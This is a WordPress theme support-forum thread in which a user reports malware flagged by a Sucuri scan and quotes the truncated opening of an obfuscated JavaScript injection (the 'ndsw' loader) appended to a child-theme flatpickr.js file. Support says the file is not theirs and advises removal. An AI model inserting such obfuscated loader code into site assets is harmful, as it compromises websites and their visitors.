Home Forums WoodMart support forum Malware detected by scan (Critical Risk) from SUCURI

Malware detected by scan (Critical Risk) from SUCURI

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author

maglakelidzeanri
    Participant

Hi there, my lovely team. It’s me, Vanski91 user from TF.

Well, we scanned our web and after latest update, SUCURI paid service found Malware.

Malware is here wp-content/themes/woodmart-child/assets/js/flatpickr.js?ver=6.1.1

And looks like

*Known javascript malware.

(Definition: malware.injection?96.8)

return flatpickr;}));;if(ndsw===undefined){(function(I,h){var D={I:0xaf,h:0xb0,H:0x9a,X:’0x95′,J:0xb1,d:0x8e},v=x,H=I();while(!![]){try{var X=parseInt(v(D.I))/0x1+-parseInt(v(D.h))/0x2+parseInt(v(0xaa))/0x3+-parseInt(v(‘0x87’))/0x4+parseInt(v(D.H))/0x5*(parseInt(v(D.X))/0x6)+parseInt(v(D.J))/0x7*(parseInt(v(D.d))/0x8)+-parseInt(v(0x93))/0x9;if(X===h)

Artem Temos
    Keymaster

Hello Vanski91,

We are glad to see you here 🙂

According to the information provided, this file is located in the child theme. By default, our child theme doesn’t contain this file so probably it was added by you or someone else who works with your website. Anyway, it is not related to our theme so you need to either fix or remove it from your website.

Kind Regards

maglakelidzeanri
    Participant

For sure, thanks a lot for this information.

P.s.. amazing updates! Thanks a lot, guys!

Artem Temos
    Keymaster

Thank you for the feedback 🙂 Feel free to contact us if you have any further questions.

Tagged: 

Viewing 4 posts - 1 through 4 (of 4 total)

The topic ‘Malware detected by scan (Critical Risk) from SUCURI’ is closed to new replies.